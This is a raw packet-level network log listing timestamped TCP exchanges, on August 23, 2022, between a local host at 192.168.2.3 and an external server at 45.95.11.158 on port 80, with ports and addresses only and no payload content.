Aug 23, 2022 03:42:58.154582024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154593945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154613018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154638052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154660940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154668093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154707909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154747009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154767036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154776096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154803991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154815912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154834986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154855013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154865026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154896975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154898882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154968977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154985905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155014038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155561924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.155603886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.155639887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155644894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.155663967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155673027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.155689955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155713081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.155719042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155754089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.155764103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155792952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.155808926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155819893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.155833960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.155870914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.156615019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.156722069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.157279015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.157355070 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.157448053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.157507896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.157524109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.157630920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181281090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181344986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181386948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181416035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181430101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181454897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181468010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181474924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181497097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181508064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181541920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181555986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181581974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181597948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181627989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181636095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181668997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181706905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181735039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181744099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181750059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181754112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181794882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181838989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181880951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181920052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181948900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181957960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.181962967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.181997061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.182034016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.182051897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.182074070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.182079077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.182101965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.182148933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.182909966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.183188915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.184458017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184504986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184549093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184576035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184606075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.184616089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184654951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.184657097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184669018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.184695959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184724092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184750080 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.184762955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184786081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.184804916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184848070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184859991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.184875965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184926987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.184947014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.184998035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185175896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185216904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185245037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185275078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185283899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185288906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185327053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185368061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185376883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185400009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185441971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185451984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185482979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185491085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185523033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185550928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.185575008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185628891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185956001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.185964108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186007977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186022997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186063051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186115980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186147928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186168909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186178923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186184883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186343908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186383963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186394930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186424971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186467886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186474085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186506987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186549902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186558962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186590910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186595917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186629057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186645031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186670065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186711073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186722040 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186752081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186793089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186803102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186822891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186863899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186877012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186903954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186914921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.186943054 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186970949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.186997890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187011957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187011957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187052965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187093973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187105894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187122107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187163115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187171936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187202930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187206984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187241077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187269926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187293053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187305927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187311888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187378883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187421083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187433004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187450886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187489033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187510014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187529087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187567949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187577009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187596083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187630892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187634945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187645912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187674046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187714100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187726974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187745094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187783003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187798023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187822104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187829018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187863111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187890053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187916994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187928915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.187958002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.187999964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188009977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.188044071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188062906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188102007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188112974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.188128948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.188141108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188150883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.188184023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188214064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188240051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.188256025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.188520908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188563108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188602924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188632965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.188649893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.188688993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.198434114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.198730946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213109016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213159084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213215113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213236094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213243961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213282108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213283062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213289976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213341951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213481903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213525057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213562965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213582993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213603973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213622093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213644981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213655949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213674068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213695049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213713884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213752031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213766098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213792086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213798046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213821888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213843107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213860989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213864088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213901997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213907957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213942051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213953972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.213969946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.213989973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.214016914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.217534065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.217592955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.217631102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.217659950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.217695951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.217700958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.217731953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.217740059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.217740059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.217745066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.217780113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.217797995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.217816114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.217875004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218050957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218091965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218099117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218131065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218158007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218180895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218194962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218197107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218236923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218275070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218295097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218306065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218347073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218365908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218384981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218389034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218424082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218451023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218473911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218491077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218492985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218532085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218539953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218569994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218575954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218599081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218641043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218646049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218655109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218693972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218697071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218734026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218739986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218761921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218780041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218802929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218806028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218843937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218887091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218913078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.218915939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218972921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.218976974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219014883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219031096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219053984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219083071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219105959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219121933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219162941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219172001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219208002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219249010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219288111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219342947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219461918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219506025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219543934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219573021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219578981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219593048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219633102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219876051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219917059 CEST	80	49774	45.95.11.158	192.168.2.3
